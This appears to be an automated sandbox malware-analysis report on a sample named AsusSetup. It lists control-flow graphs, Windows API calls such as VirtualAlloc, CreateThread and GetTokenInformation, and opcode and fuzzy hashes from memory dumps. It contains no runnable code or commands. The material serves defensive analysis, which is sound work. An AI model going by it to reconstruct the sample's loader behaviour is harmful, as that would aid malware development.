                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 791 1fd8f40-1fd8f55 SetFilePointerEx 792 1fd8f5b 791->792 793 1fd8b45-1fd8b4e 791->793 796 1fd8f61 792->796 797 1fd9162-1fd9168 792->797 794 1fd8b7b-1fd8fb7 SetFilePointerEx 793->794 795 1fd8b50 793->795 804 1fd8fbd-1fd910c 794->804 805 1fd8c46 794->805 795->794 798 1fd8b52-1fd9053 795->798 796->797 799 1fd8f67 call 1fd9180 796->799 800 1fe5d2a 797->800 811 1fd9059 798->811 812 1fd8b33-1fd8b43 WriteFile 798->812 799->800 800->800 813 1fd89b8-1fd89be call 1fda380 804->813 814 1fd9112 804->814 808 1fd8c98-1fd8cad call 1fd99f0 805->808 822 1fd9087-1fd9088 808->822 823 1fd8cb3 808->823 811->811 812->793 821 1fd89c3 813->821 814->813 818 1fd9118 814->818 818->818 825 1fd89ac-1fd89af 821->825 826 1fd89c5 821->826 824 1fd90f0 822->824 823->822 827 1fd8cb9 823->827 828 1fd8b9f 824->828 829 1fd90f6 824->829 825->805 826->812 830 1fd8f69 826->830 831 1fd8d6a-1fd8d6d 827->831 828->831 830->825 832 1fd8f6f-1fd8f71 830->832 831->808 833 1fd8f73-1fd8f7b call 1fd99f0 832->833 836 1fd8dcc-1fd8dd8 833->836 837 1fd8f81 833->837 838 1fd8e2b-1fd8e37 call 1fdd590 836->838 839 1fd8dda 836->839 837->836 840 1fd8f87-1fd900a 837->840 851 1fd8ea3-1fd8eb2 838->851 839->838 843 1fd8ddc-1fd8de1 839->843 845 1fd8a1d-1fd8a20 840->845 846 1fd9010 840->846 847 1fd8de3 843->847 849 1fd8f3b 845->849 850 1fd8a26 845->850 846->845 848 1fd9016 846->848 847->824 848->822 853 1fd8f0a-1fd8f0e 849->853 850->849 852 1fd8a2c 850->852 851->833 854 1fd8eb8 851->854 852->828 855 1fd8965-1fd8d74 call 1fd9c70 852->855 853->851 856 1fd8f10 853->856 854->833 858 1fd8ebe 854->858 855->805 863 1fd8d7a-1fd8d81 855->863 856->851 859 1fd8f12 856->859 858->853 859->847 863->828 864 1fd8d87 863->864 864->824
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 835b528c6dcffabb250974905218d0cb35aa061c9c7f48dde8b7e13ad1b7d173
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: cd56ab8ff6e276b2e556f1b528d39d12af280ee1fc48a60ef6adede6bb72cf00
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 835b528c6dcffabb250974905218d0cb35aa061c9c7f48dde8b7e13ad1b7d173
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EEE08665D0D788DAE77B577C484C3797E93AB422D8F0C054BE5A1C60A6C667CC028712
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD9625 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 865 1fd9625-1fd9656 SetFilePointerEx 866 1fd96fd 865->866 867 1fd97c5 866->867 868 1fd9703-1fd9982 866->868 869 1fd96ef-1fd9759 867->869 870 1fd97cb 867->870 872 1fd9988 868->872 873 1fd9734-1fd9735 868->873 876 1fd959c-1fd95a2 869->876 877 1fd975f 869->877 870->869 874 1fd97d1 870->874 872->873 878 1fd998e 872->878 879 1fd973e 873->879 874->879 881 1fd954a-1fd9556 SetFilePointerEx 876->881 877->876 880 1fd9765-1fd9783 877->880 883 1fd9998-1fd999f 878->883 879->867 887 1fd973f-1fd9754 call 1fdea60 880->887 888 1fd9785 880->888 884 1fd98c5 881->884 889 1fd99a5 883->889 890 1fd98b4 883->890 885 1fd985c-1fd985f 884->885 886 1fd98c7-1fd98d0 884->886 897 1fd9847-1fd984f 885->897 898 1fd9861 885->898 891 1fd9968-1fd9970 call 1fdeb00 886->891 892 1fd98d6 886->892 912 1fd9874 887->912 888->887 893 1fd9787 888->893 889->890 894 1fd99ab 889->894 895 1fd9884 890->895 896 1fd98b6 890->896 891->885 892->891 904 1fd98dc 892->904 914 1fd97b2 893->914 894->891 906 1fd98bc 896->906 907 1fd9718 896->907 908 1fd9855 897->908 909 1fd9512-1fd951d 897->909 901 1fd9867 898->901 902 1fd9570 898->902 901->902 911 1fd986d 901->911 915 1fd9634-1fd9637 call 20072f4 902->915 904->904 906->884 907->873 908->914 909->911 913 1fd9523 909->913 911->912 918 1fd987a 912->918 919 1fd9913-1fd99d0 912->919 913->911 916 1fd9529-1fe8d1c 913->916 914->867 921 1fd963c 915->921 918->919 922 1fd9880-1fd9882 918->922 919->883 921->897 924 1fd9642 921->924 922->895 924->897 925 1fd9648-1fd9656 SetFilePointerEx 924->925 925->866
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 412e19964fa084b0320597dc17b3db4847efaffa2005f417fa316b51f5812584
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 1d9630e6c38abda1b84482df013835b7fb9ace59761ba44e9e1b53710ac8d18a
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 412e19964fa084b0320597dc17b3db4847efaffa2005f417fa316b51f5812584
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8EE0925124E3818ED3139FB858087B53EB2BF021ACF4D038EB4A5C60E3DB5B8809C701
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8B76 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    control_flow_graph 926 1fd8b76 927 1fd8b7b-1fd8fb7 SetFilePointerEx 926->927 929 1fd8fbd-1fd910c 927->929 930 1fd8c46 927->930 933 1fd89b8-1fd89c3 call 1fda380 929->933 934 1fd9112 929->934 932 1fd8c98-1fd8cad call 1fd99f0 930->932 940 1fd9087-1fd9088 932->940 941 1fd8cb3 932->941 943 1fd89ac-1fd89af 933->943 944 1fd89c5 933->944 934->933 937 1fd9118 934->937 937->937 942 1fd90f0 940->942 941->940 945 1fd8cb9 941->945 946 1fd8b9f 942->946 947 1fd90f6 942->947 943->930 948 1fd8f69 944->948 949 1fd8b33-1fd8b4e WriteFile 944->949 950 1fd8d6a-1fd8d6d 945->950 946->950 948->943 951 1fd8f6f-1fd8f71 948->951 949->927 953 1fd8b50 949->953 950->932 954 1fd8f73-1fd8f7b call 1fd99f0 951->954 953->927 955 1fd8b52-1fd9053 953->955 960 1fd8dcc-1fd8dd8 954->960 961 1fd8f81 954->961 955->949 962 1fd9059 955->962 963 1fd8e2b-1fd8e37 call 1fdd590 960->963 964 1fd8dda 960->964 961->960 965 1fd8f87-1fd900a 961->965 962->962 976 1fd8ea3-1fd8eb2 963->976 964->963 968 1fd8ddc-1fd8de1 964->968 970 1fd8a1d-1fd8a20 965->970 971 1fd9010 965->971 972 1fd8de3 968->972 974 1fd8f3b 970->974 975 1fd8a26 970->975 971->970 973 1fd9016 971->973 972->942 973->940 978 1fd8f0a-1fd8f0e 974->978 975->974 977 1fd8a2c 975->977 976->954 979 1fd8eb8 976->979 977->946 980 1fd8965-1fd8d74 call 1fd9c70 977->980 978->976 981 1fd8f10 978->981 979->954 983 1fd8ebe 979->983 980->930 988 1fd8d7a-1fd8d81 980->988 981->976 984 1fd8f12 981->984 983->978 984->972 988->946 989 1fd8d87 988->989 989->942
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 8b5d510f54f190b41ef9304eccb758e96c77d313a1906c0b31328302ad949a01
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 01659f5a9d69977d25391274df4c699428212f00977f0517ab851a1225de27a0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b5d510f54f190b41ef9304eccb758e96c77d313a1906c0b31328302ad949a01
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFD02236B2850CCA2B3D8F7D0AA02392543E3D80E031E872DC1ABE2084DD3354020003
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD615A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: File$PointerRead
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3154509469-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: f38b3d7fc64b22a56f2c86c710218589a1fe9382d05e0b8a998e624ad2d28af1
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: dedef7d1b66d500d0234ccfe2d4217c95fa0bfd501af14f56e554af88ff930a0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f38b3d7fc64b22a56f2c86c710218589a1fe9382d05e0b8a998e624ad2d28af1
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95D0C922A581068AFB794A3DA82D3376B87A74463AF089739C163C01D1DF6780025644
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD92DD Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 83dbcb6670d8f604cd81e2834c63a396093eb5b0311d9ad889ae66546caaff62
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: cb4454bcb0870175654fc909126e255aeb08ee1d12f1d0ad8db93a1d853bbd19
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83dbcb6670d8f604cd81e2834c63a396093eb5b0311d9ad889ae66546caaff62
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AED01232418604CAE651DBD5C845B7B7A9BF78510EF0CC50C958BD1251CBFBC309C562
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8FAA Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 723acebcdce85ba2f10dda4430793235e2ab0109130791c18cab4d7bdce07846
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0773a61b503779ee40d3f1a8100361dbac04534f1ad9ce614f99bcc220321267
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 723acebcdce85ba2f10dda4430793235e2ab0109130791c18cab4d7bdce07846
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1AC02B3280460FC73F264B9C53D423C3873E7485C830C021DD587E1006DD33A0404A03
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD5D50 Relevance: 1.5, APIs: 1, Instructions: 8threadCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CreateThread$CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 738052048-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 3651ebeecc76a59b121bf69a9b05c8b26e3ef986d63b580bc54d31fef3873661
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b23c4dad9cccc72c390ba8dfef486248ba2e75f4a7df7cd1f89f04c01369b0b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49B0120382CE87C508261B38085853819A62F460349BC1F6C8FB3078F3D80304065330
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD5990 Relevance: 1.4, APIs: 1, Instructions: 103COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 1284135714-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: d80218c56ce82e53d6210647fcc3cfaa07821b1dc8e388689e5769b46d98d13b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 56b75e79182fd3332015568e40a041d1bf1980b992ce31b76ef23cc3cdb8c9e3
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d80218c56ce82e53d6210647fcc3cfaa07821b1dc8e388689e5769b46d98d13b
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9021A832D1DBB4CFE76B931C48D46B52AB3BB96324F4C01DBD086CB1B2D92B49058247
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8245 Relevance: 1.3, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: caa725a902d60e659633ec615f2acf4b142068780a329095be708c1c73959928
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 262f63ed467da772506c05de75a4032c11b624772aef1f84222c80f56183a4cb
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: caa725a902d60e659633ec615f2acf4b142068780a329095be708c1c73959928
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0A426D1DA91CFE627D71C945197A7FA3AF82290B4D008AD44BCB563CA179C02D793
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD83E7 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 51649a53adf5be35349eb32c6ae77fada500a909c13eaf169d54f29d69e3d903
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 503c1ad91aea7a5e0fd56d7a1d992a80918f029766c32a84f283e1e6ddad448d
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0FF09036D1C941CB9636C70CD881E3A3F63BB412C1B5C4049C54BCB523D627D802C793
                                                                                                                                                                                                                                                                                                                                                                                                                    Function 01FD8318 Relevance: 1.3, APIs: 1, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleInformationToken
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3954737543-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 9b2a996806d0e1ab8775e128a97441143bc041f4e270ebe5118209dafafe8652
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 77a015f8ebc331779973eb2bd4a9dafca6344b1b5edfd1b30c85a8ef24a0a0c6
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0F09026C1D641CBAA268B1CD8829793BA3BF412D0B5C4049C54BCB123DA2BD806C753

                                                                                                                                                                                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                    Function 02002ED0 Relevance: 1.8, APIs: 1, Instructions: 321COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2473311426.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FD0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_1fd0000_AsusSetup.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                    • API ID: _clrfp
                                                                                                                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                    • API String ID: 3618594692-0
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode ID: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 0b73e033d43f55f71e1b6c96d673c53d9607d73c77ba2ae8568d9873bd2c98d3
                                                                                                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb89a8a385eca23818c00267d82649db9f1e568ecff9ee33809bd01fc8c9252f
                                                                                                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06B14831510B4DCFEB9ADF1CC88ABA677E0FB59308F198599E859CB2A1C335D852CB41

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    Execution Coverage:5.3%
                                                                                                                                                                                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Nodes:56
                                                                                                                                                                                                                                                                                                                                                                                                                    Total number of Limit Nodes:4
                                                                                                                                                                                                                                                                                                                                                                                                                    execution_graph 3904 be58de 3905 bf53f0 VirtualAlloc 3904->3905 3906 be58f9 3905->3906 3907 be81c0 3 API calls 3906->3907 3908 be5907 3907->3908 3864 be5b8f 3875 bf53f0 3864->3875 3866 be5baf 3880 be81c0 3866->3880 3868 be5c2c 3869 be5c84 3886 be5990 3869->3886 3871 be5bbc 3871->3868 3871->3869 3873 be5d56 CreateThread 3871->3873 3874 be5cd4 CreateThread CloseHandle 3871->3874 3872 be5dcd 3872->3872 3873->3871 3874->3871 3877 bf53f4 3875->3877 3876 bf53f6 3876->3866 3877->3876 3878 bf545e VirtualAlloc 3877->3878 3879 bf5460 3878->3879 3879->3877 3884 be81e5 3880->3884 3881 be8357 GetTokenInformation 3881->3884 3882 be830b CloseHandle 3882->3884 3883 be8212 GetTokenInformation 3883->3884 3884->3871 3884->3881 3884->3882 3884->3883 3885 be81f7 3884->3885 3885->3871 3889 be5994 wcscpy 3886->3889 3887 be5a23 3887->3872 3888 be5a8d VirtualAlloc 3888->3889 3889->3887 3889->3888 3890 be83e7 3893 be81e5 3890->3893 3891 be830b CloseHandle 3891->3893 3892 be8212 GetTokenInformation 3892->3893 3893->3891 3893->3892 3894 be8357 GetTokenInformation 3893->3894 3895 be81f7 3893->3895 3894->3893 3939 be5d22 3940 be5bbc 3939->3940 3941 be5cd4 CreateThread CloseHandle 3939->3941 3940->3941 3942 be5c2c 3940->3942 3943 be5d56 CreateThread 3940->3943 3944 be5c84 3940->3944 3941->3940 3943->3940 3945 be5990 VirtualAlloc 3944->3945 3946 be5dcd 3945->3946 3946->3946 3933 be81e3 3937 be81e5 3933->3937 3934 be8357 GetTokenInformation 3934->3937 3935 be830b CloseHandle 3935->3937 3936 be8212 GetTokenInformation 3936->3937 3937->3934 3937->3935 3937->3936 3938 be81f7 3937->3938 3896 be5d50 CreateThread 3903 be5bbc 3896->3903 3897 be5cd4 CreateThread CloseHandle 3897->3903 3898 be5c84 3900 be5990 VirtualAlloc 3898->3900 3899 be5c2c 3901 be5dcd 3900->3901 3901->3901 3902 be5d56 CreateThread 3902->3903 3903->3897 3903->3898 3903->3899 3903->3902

                                                                                                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                                                                                                    Function 00BE81C0 Relevance: 4.9, APIs: 3, Instructions: 375COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                                                                                                                                                                                    • Not Executed
